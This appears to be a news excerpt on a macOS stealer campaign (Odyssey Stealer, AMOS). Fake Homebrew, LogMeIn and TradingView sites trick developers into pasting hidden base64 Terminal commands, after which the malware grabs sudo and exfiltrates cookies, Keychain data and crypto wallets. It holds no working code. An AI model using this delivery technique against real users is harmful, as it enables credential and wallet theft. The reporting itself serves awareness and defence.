"The campaign spreads the Odyssey Stealer and AMOS (Atomic macOS Stealer) malware families. Both families focus on stealing system information, browser data, and crypto wallet login details. The attacks are carefully designed to exploit developers' trust. The fake Homebrew and TradingView sites display seemingly legitimate download portals with buttons such as Copy command. When a user clicks the button, a hidden, base64-encoded Terminal command is copied to the clipboard."
"In some cases, the command was presented as a so-called security verification process, for example via a fake Cloudflare check. Technical analysis shows that immediately after installation, the malware attempts to obtain administrator privileges via sudo, collects system information, and terminates processes such as OneDrive updates to hinder detection or recovery. Sensitive data such as browser cookies, Keychain information, and crypto wallets are then exfiltrated to the command-and-control server."
Over 85 domains host fake macOS download sites impersonating Homebrew, LogMeIn, and TradingView. Social engineering prompts developers to click 'Copy' buttons that place base64 Terminal commands into the clipboard. Executing those commands downloads a shell script that bypasses macOS protections and installs Odyssey Stealer or AMOS. After installation, the malware requests sudo, collects system information, and terminates processes like OneDrive updates to hinder detection. The malware exfiltrates browser cookies, Keychain entries, and crypto wallet credentials to command-and-control servers. Paid search ads drive traffic to malicious domains; servers and SSL certificates are reused and registered to individuals, indicating a semi-professional, long-term operation.
Read at Techzine Global
Unable to calculate read time
Collection
[
|
...
]